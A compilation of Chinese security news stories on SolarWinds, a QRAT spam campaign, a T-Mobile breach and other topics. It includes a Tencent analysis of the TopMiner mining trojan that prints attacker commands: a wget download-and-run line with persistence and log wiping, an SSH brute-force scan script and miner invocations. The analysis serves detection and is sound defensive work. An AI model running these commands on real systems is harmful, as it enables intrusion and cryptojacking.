外媒The Verge援引《华尔街日报》报道称，发现自己受到SolarWinds黑客攻击影响的美国公司和机构名单还在不断增加，他们正在努力应对黑客入侵的一个巨大未知数：攻击程度有多严重。联邦司法系统现在很可能是其中之一，它不会冒任何风险。该机构对此十分担心，尽管目前疫情严重，但法院工作人员现在必须亲自送达敏感文件。 “根据今天宣布的新程序，向联邦法院提交的高度敏感的法院文件（HSDs）将以纸质形式或通过安全的电子设备被接受，并存储在一个安全的独立计算机系统中。这些密封的HSDs将不会上传到CM/ECF。” 这里的信息很清楚：在弄清楚黑客对系统做了什么之前，司法机构不希望其最敏感的文件出现在系统上，并且愿意在提交文件的过程中增加不少摩擦。他们不能再仅仅通过互联网发送，他们必须亲手递送实际的纸张或U盘。 “我们完全理解采取这些措施的实际影响，以及这些措施将给法院带来的行政负担，但是，任何这种负担都比保护有可能被泄露的密封文件的机密性的需要更重要。” 有关文件不一定是日常法庭诉讼的常规密封记录。《华尔街日报》的文章指出，HSDs可能包含调查人员如何处理案件的详细解释，以及目前可能被监视的人的信息。了解这些信息可以帮助某人避免被发现或调查，这就是为什么要保证这些信息的安全。 虽然这些措施表明，司法机构认为不能信任其现有的网络，但公众对法庭记录的访问不会改变。任何本来可以公开的记录仍然会被上传到案件管理和电子案卷系统中。         （消息来源：cnBeta；封面来自网络）

Cybesecurity研究人员今天观察到一个恶意垃圾邮件活动，该活动通过发布美国总统唐纳德·特朗普（Donald Trump）的丑闻假视频来传播远程访问木马（RAT）。 电子邮件的主题为“ GOOD LOAN OFFER !!”，附带一个名为“ TRUMP_SEX_SCANDAL_VIDEO.jar”的Java存档（JAR）文件，一旦被下载，该文件会将Qua或Quaverse RAT（QRAT）安装到系统中。 Trustwave高级安全研究员戴安娜·洛帕（Diana Lopera）在文章中说：“我们怀疑，黑客正试图利用最近结束的总统大选的噱头进行网络犯罪活动。” 最新的恶意活动是八月份发现的基于Windows的QRAT下载器的变体。 感染链从包含嵌入式附件或指向恶意zip文件的链接的垃圾邮件开始，它们均会检索使用Allatori Java混淆器加扰的JAR文件（“ Spec＃0034.jar”）。 第一阶段下载程序将Node.Js平台设置到系统上，下载并执行称为“ wizard.js”的第二阶段下载程序，该程序负责持久获取并运行Qnode RAT（“ qnode-win32-ia32。 js”）。 QRAT是典型的远程访问木马，具有获取系统信息、执行文件操作以及从Google Chrome、Firefox、Thunderbird和Microsoft Outlook等应用程序获取凭据的功能。 这次恶意活动的变化是包含了一个新的弹出警报，该警报会通知受害者正在运行的JAR是用于渗透测试的远程访问软件。这也意味着，一旦用户单击“确定”按钮，该样本的恶意行为就会开始显现。 此外，JAR下载程序的恶意代码被分为不同的随机编号的缓冲区以逃避检测。 其他变化包括JAR文件大小的增加以及为更新的恶意软件链而取消了第二阶段的下载程序，更新的恶意软件链可立即获取QRAT有效负载（现称为“ boot.js”）。 就其本身而言，RAT除了通过VBS脚本负责保持在目标系统上的持久性外，还使用了base64编码对代码进行了加密。 Topera总结说：“自我们首次检查以来，该恶意软件的威胁已大大增强。”他敦促管理员在电子邮件安全网关中阻止传入的JAR。         消息及封面来源：The Hacker News，译者：江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.c

捷克软件开发公司JetBrains今天声明，否认 《纽约时报》和《华尔街日报》 刊登的JetBrains涉嫌参与SolarWinds黑客攻击事件的报道。 调查人员认为，黑客将JetBrains的产品命名为TeamCity，该产品是用于将组件组装到软件应用程序中的CI / CD（持续集成/持续开发）服务器。 JetBrains首席执行官马克西姆·沙菲罗夫（Maxim Shafirov）发表博客表示： “ SolarWinds是我们TeamCity的用户，这是用作构建软件的持续集成和部署系统 。” 他补充说：“ SolarWinds或政府机构尚未与我们联系，提供有关违规的任何详细信息。我们会给予充分的合作。” 但俄罗斯JetBrains首席执行官并没有完全排除其产品被SolarWinds黑客滥用的可能性。 这位高管说：“要强调TeamCity是需要适当配置的产品。如果TeamCity被滥用，那很可能是由于配置错误，而不是特定的漏洞。” 我们仍不清楚所谓的JetBrains违规行为。 正如ETH安全研究中心研究员Stefan Soesanto早些时候在Twitter表示的那样：在对JetBrains承担责任之前，我们需要澄清更多细节。       消息及封面来源：ZDnet，译者：江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.c

尽管经常上网的人们已经熟知各个线上服务对于密码强度的规则要求，但卡内基梅隆大学（CMU）的 CyLab 安全隐私实验室主任 Lorrie Cranor 认为，网站和用户其实都可以做到更好。据悉，为了增强被黑客攻破的难度，许多情况下，线上服务都会要求用户输入至少 8 个（或 10~12 个）字符的密码，并混用大小写字母、数字、以及特殊符号。 举个例子，如果要求在密码中混入数字，很多人可能旨在末位加个“1”。如果要求标点的话，可能只会多个感叹号“！”。如果需要大写的话，那可能首字母就是个大写。 然而 CMU 研究人员指出，这并不能让你的密码变得“更强”。为此，该研究团队提出了一套新方案 —— 在输入了最低字符数后，安全检查仪表板可给出更科学的建议。 通过持续数年的研究，这些技巧可让密码强度计和其它评估系统更好地工作（通常用颜色来区分密码强弱），比如使用斜杠或随机字母来分隔常用单词，以便用户跳过常见的密码设置陷阱。 在一项实验中，用户被要求创建至少包含 10 个字符的密码，然后研究人员借助密码强度计对其展开评估。 结果表明，尽管许多人在设置密码时符合了安全检查的所有要求，但还是很容易被猜破，因为大多数人都遵循着相同的思维模式。 在 11 月的 ACM 计算机和通信安全会议上，Lorrie Cranor 与研究合著者 Joshua Tan、Lujo Bauer、Nicolas Christin 介绍了他们的最新发现，并希望有关方面能够采纳他们的建议。 不过就算最佳的线上服务密码设置方案，可能还不如用一款靠谱的密码管理器，来创建和记住分别针对每一个网站的随机、超长、高强度密码来得管用。         （消息来源：cnBeta；封面来自网络）

Google Chrome 刚刚修复了一个影响浏览器在 Windows 10 操作系统上创建新文件的 Bug 。此前在使用“ImportantFileWriter”输出某些文件时，反病毒软件可能会阻止 Google Chrome 浏览器执行包括新建书签等在内的操作。 据悉，为安全起见，反病毒软件通常会临时锁定系统上新生成的文件，直到对其完成了反病毒扫描、并排除了恶意活动的可能。 谷歌工程师 Bruce Dawson 解释称：“反病毒程序和其它扫描软件可能会暂时锁定新创建的文件，但这可能引发频繁的问题，比如在保存新建的浏览器书签、或其它基于 ImportantFileWriter 执行的操作时”。 好消息是，正如 Windows Latest 在本周早些时候首次报道的那样，即便启用了防病毒工具，Chromium 团队已经引入了一项增强功能，以便 Chrome 浏览器能够在 Windows 10 上平稳运行。 由提交的 Chromium 代码可知，修复程序通过多次重试 ReplaceFile 的方法来规避相关问题。在避免争抢文件访问权限的同时，防病毒程序可控制（并锁定）被 Chrome 同时访问的文件。 庆幸的是，这个 Important_file_writer.cc 的 Bug 仅影响 Windows 操作系统平台（修复如上图第 45 行所示）。 此外本次改进还引入了机器学习方面的新体验，意味着随着使用时间的增长，Chromium 将自动学会如何通过一些细微的操作来避开这种竞争条件（所需的失败尝试次数）。 自 2020 年 12 月 30 日起，该修复程序已合并到 Chromium 的项目代码存储库中，预计可在下一版本的 Google Chrome 浏览器中得到全面修复。 有需要的用户，还请及时留意 Google Chrome 浏览器的后续版本更新。           （消息来源：cnBeta；封面源自网络）

据外媒报道，美FBI、NSA、网络安全与基础设施安全局(CISA)和国家情报总监办公室(ODNI)于当地时间周二发表联合声明称，SolarWinds的黑客行为“可能来自俄罗斯”。这是这四家机构首次将网络攻击归咎于俄罗斯。 声明称：“这项研究表明，一个高级持续性威胁(APT)行为者可能来自俄罗斯，其对最近发现的大部分或全部政府和非政府网络正在进行的网络攻击负有责任。目前，我们认为，这是一项情报收集工作，而且将继续如此。” 美国务卿迈克·蓬佩奥上月曾在接受新闻采访时表示，SolarWinds袭击很可能来自俄罗斯，但直到现在都还没有做出正式声明。 最新的这份联合声明则补充称，在1.8万家受影响的公司和机构中迄今发现只有10家美国政府机构受到系统后续活动的影响。 由FBI、NSA、CISA、ODNI组成的网络统一协调小组仍在继续调查这起始于2020年的黑客入侵事件，当时黑客侵入了总部位于德克萨斯州奥斯汀的SolarWinds的IT管理软件。 据报道，此次入侵包括美国财政部高层使用的电子邮件系统。       （消息及封面来源：cnBeta）

一、概述 腾讯主机安全（云镜）检测到挖矿木马TopMiner近期攻击十分活跃，该木马通过SSH弱口令爆破进行攻击入侵，会清除竞品挖矿木马，同时会使用爆破工具在内网横向传播。根据其挖矿钱包收益估算，约有1.5万台服务器被该团伙控制挖矿。由于其使用的挖矿木马名为top，腾讯安全将其命名为TopMiner挖矿木马。 TopMiner挖矿团伙针对SSH弱口令进行爆破攻击，成功后执行命令下载恶意shell脚本，并将启动脚本写入crontab定时任务进行持久化，shell脚本继续下载挖矿木马nginx、top启动挖矿。 木马入侵系统后，还会下载SSH爆破程序sshd，扫描到网络中开放22端口的Linux系统机器后，通过实时更新的密码字典对其root账号进行爆破攻击。攻击者在爆破攻击程序代码留下注释：”宽带充足基本可以12个小时扫描全球”，气焰可谓十分嚣张。 分析过程中，我们还在黑客控制的服务器上发现了具有执行远程命令功能的backdoor木马、具有DDoS攻击、远程shell功能的kaiji木马、黑客可使用这些木马对目标系统进行完全控制。 腾讯云主机安全（云镜）支持对云主机是否存在SSH空口令、弱口令进行检测并向客户告警，通过分析获得流行病毒木马内置的弱密码字典来检测云主机弱密码风险，具有很强的实战性。腾讯安全专家建议企业安全运维人员尽快解决服务器配置弱口令的风险。 自查处置建议 腾讯安全专家建议企业安全运维人员对服务器进行检查，清理以下相关项： 文件和进程： /tmp/.top-unix/nginx /tmp/.ICE-unix1/top /srv/.ICE-unix1/sshd /srv/.ICE-unix1/scan.sh /etc/ipv6_addrconf /etc/crypto Crontab定时任务： /tmp/.top-unix/top            -o              stratum+tcp://pool.supportxmr.com:8080               -u 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN -p X /tmp/.top-unix/nginx           -o           stratum+tcp://mine.c3pool.com:15555                 -u 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL -p X /etc/crypto 腾讯安全响应清单 腾讯安全系列产品可针对TopMiner挖矿木马攻击传播的各个环节进行阻断拦截： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）TopMiner挖矿团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）TopMiner挖矿团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）TopMiner木马关联的IOCs已支持识别检测； 2）检测SSH弱口令爆破攻击。 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀TopMiner木马程序； 2）主动检测系统是否存在SSH弱口令并提示； 3）检测SSH弱口令爆破攻击。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测TopMiner木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta   二、详细分析 2.1、攻击入侵方式 病毒通过SSH弱口令爆破入侵系统，随后执行恶意命令下载脚本crypto，并将其写入crontab定时任务。 bash -c cd /etc wget -P /etc http://103.45.183.12:808/crypto chmod 0777 crypto nohup /etc/crypto > /dev/null 2>&1 & chattr +i /etc/crypto echo "/etc/crypto">>/etc/rc.local echo "/etc/crypto">>/etc/crontab echo > /var/log/wtmp history -c crypto会检查自己的挖矿进程/tmp/.ICE-unix1/top是否存在，如果不存在会判断是否有竞品挖矿木马存在，然后会杀掉竞品挖矿木马进程kswapd0、rsync、tsm、work32、work64、go、joseph，然后从C2服务器下载挖矿木马top并启动挖矿。 Top挖矿木马下载地址为：http[:]//xiazai.qq360bidu.me:808/top 挖矿使用矿池：91.121.140.167:443 挖矿使用钱包： 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL 根据其矿池算力平均340KH/s，可推算该挖矿团伙已控制约1.5万台服务器进行挖矿，平均每天获利约154美元（0.17个门罗币），折合人民币约1000元。 2.2、横向移动 木马入侵系统后会接着下载端口爆破程序sshd以及待攻击的IP列表ips.txt、用户名字典user.txt、密码字典password.txt到/srv/.ICE-unix1/目录下。 观察文件被创建的时间，除了爆破程序sshd和用户名列表user.txt是6月份被修改过（可能是初次创建），其他文件操作时间均为12月，并且密码字典文件password.txt的修改时间就在近期。可见其感染系统后，攻击模块一直处于活跃状态，并且攻击对象、密码字典在持续更新扩充。 其中一个待爆破IP列表里有超过19万个IP地址： 爆破用户名：root，其中一个密码字典有1700余个密码，部分如下： 攻击时脚本scan.sh负责启动扫描进程masscan和爆破进程sshd，脚本代码如下： #!/bin/bash yum install masscan -y apt-get install masscan -y if [ $# -ne 4 ]; then echo "脚本默认安装扫描工具为masscan" echo "运行参数应为 ./scan.sh IP范围 端口 扫描线程 爆破线程" echo "IP范围支持1.0.0.0-1.255.255.255或 1.0.0.0/8这种" echo "扫描线程取1-100万左右,G口肯定是30-100万跑,线程越低结果越准,宽带充足基本可以1 2个小时扫描全球" exit fi echo '' > a.txt masscan $1 -p $2 --rate $3 --excludefile pingbi.txt -oL a.txt echo '' > ip.txt cat a.txt | grep -B0 open | grep -oP '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -u > ip.txt./sshd ip.txt user.txt password.txt $2 $4   在实际攻击过程中，针对22端口进行爆破，爆破线程被设置为1000。 ./sshd ips.txt user.txt password.txt 22 1000   2.3、该团伙使用的其他木马 除了shell脚本、挖矿木马、爆破程序之外，我们在黑客控制的服务器上还发现了具有DDoS和远程shell功能的Kaiji木马，以及backdoor木马cnet2。 挖矿木马“ipv6_addrconf”、“systemd”、“top”为挖矿程序XMRig编译，其中“ipv6_addrconf”、“systemd”通过加UPX壳保护。 backdoor木马“cnet2”，具有监听端口，连接服务端，下载文件，执行远程命令等功能。 Kaiji木马“3”、“amd64”、“php-fpm”采用Go语言编写，具有DDoS攻击、远程shell以及SSH爆破攻击等功能，详情可参考腾讯安全此前的分析报告 https://s.tencent.com/research/report/1168.html。             IOCs IP 103.45.183.12（ZoomEye搜索结果） Domain xiazai.qq360bidu.me URL http[:]//xiazai.qq360bidu.me:808/top http[:]//103.45.183.12:808/crypto MD5 amd64 c491074d7723e6a6b1b1b8fb002f09b6 cnet2 9d2681b69116f866477dbe3bda0cbf49 top f74d1803befb993040aab866dbe6f12f systemd 640c6f1e7a5efdba49aeaa06d0dac304 crypto 9f0993ac09182d9ec08d1c562d2cfcbd sleep fbf0dccc0d9e674858d63e521eb122a0 sshd 15a653e96bada2fc2e47db59d863f4ff ipv6_addrconf b641d939b7cf70606ff5826f68c47d29 钱包： 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL

过去一周，美国政府对无人机法案实施了一次相当大规模的修改，并且可能对个人用户的隐私造成巨大影响。新法案规定，美国领空中的几乎每一架无人机及其操控者，都必须广播自身的位置，以应对与领空安全、国家安全和执法等相关的问题。 现在看来，谷歌母公司 Alphabet 旗下的无人机交付企业 Wing，已经对新规表达了相当不满意的态度。 在一篇标题为《广播识别无人机或对消费者造成意想不到的后果》的文章中，Project Wing 团队认为：“新规或让观察者追踪消费者的位置、动作和去向意图，以及居住地、包裹交付时间和地点等隐私。社区不会接受给他们送货的地面车辆或出租载具受到此种监视，这种情况放到空中也是同理” 当然，Wing 不是完全反馈广播送货无人机的定位信息，只是不希望通过本地广播的形式来发送，反而更希望通过互联网来发送。 有趣的是，在 2019 年 12 月最初提出远程 ID 规则的时候，美国联邦航空管理局（FAA）本是打算启用基于互联网的无人机追踪的。 可由于后来收到了来自评论员的意见，其中谈到了基于互联网的追踪可能面临哪些问题，最终还是选择了放弃。 • 比如首先需要为无人机配备蜂窝移动网络的通讯模块； • 人们需要为每架无人机交付数据流量的月租费用； • 全美缺乏完整、可靠的蜂窝移动网络覆盖； • 需要向第三方代理缴纳追踪和存储数据的成本； • 第三方管理不善导致的数据泄露风险； • 以及数据代理网络和无人机可能遭受 DDoS 攻击等可能。       （消息及封面来源：cnBeta）

据外媒报道，美国第三大手机运营商T-Mobile最近完成了跟Sprint的260亿美元合并并在2020年底宣布了今年的第二次数据泄露。这家手机巨头在其网站上发布的一份通知中称，它最近发现一些客户的账号信息遭到了未经授权的访问，包括T-Mobile为提供手机服务而收集和制作的客户数据。 这些数据被称为客户专有网络信息(CPNI)，包括通话记录，如何时通话、通话时间时长、每次通话的呼叫者的电话号码和目的电话号码以及可能在客户账单上找到的其他信息。 不过该公司表示，黑客没有访问姓名、家庭或电子邮件地址、财务数据和账户密码（或pin码）。 通知没有说明T-Mobile何时发现了漏洞，只能说它现在正在通知受影响的用户。 T-Mobile的一位发言人并未回复记者的置评请求，但他告诉一家新闻网站，此次事件影响了T-Mobile约0.2%的用户–也就是约20万名用户。 这是近年来攻击这个手机巨头的最新一起网络安全事件。 2018年，T-Mobile表示多达200万用户的个人信息可能被窃取。一年后，该公司证实黑客入侵了另外100万个预付费用户的记录。就在2020年的几个月前，T-Mobile承认其电子邮件系统遭到入侵，黑客入侵了一些T-Mobile员工的电子邮件账户并曝光了一些客户数据。           （消息及封面来源：cnBeta）

援引《纽约时报》报道，SolarWinds 被黑事件对美国政府机构、私营企业造成的危害可能比预期的更加严重。根据目前掌握的最新信息，大约有超过 250 家美国联邦机构和企业受到影响。 微软表示，黑客入侵了 SolarWinds 的 Orion 监控和管理软件，从而让他们能够冒充该组织现有的任意用户和帐号，包括拥有高级别权限的账户。纽约时报报道称，疑似有俄罗斯政府背景的黑客组织利用供应链的层级来访问这些机构的系统。 纽约时报在报道中指出，美国网络司令部和国家安全局在外国网络内部放置的用于检测潜在攻击的预警传感器似乎在这次事件中失效了。此外，报道中还指出在今年总统大选期间，政府还利用了 SolarWinds 的资源和技术来进行检测，从而让黑客躲过了美国国土安全部门的检测。 本周早些时候，微软发现多个系统被渗透，其中不仅仅只是 SolarWinds 恶意代码。黑客能够 “查看一些源代码库中的源代码”，但授予访问权限的黑客账户并没有修改任何代码或系统的权限。 不过一个好消息是，微软发现“没有证据表明生产服务或客户数据被访问”，“没有迹象表明我们的系统被用来攻击他人”。         （消息及封面来源：cnBeta）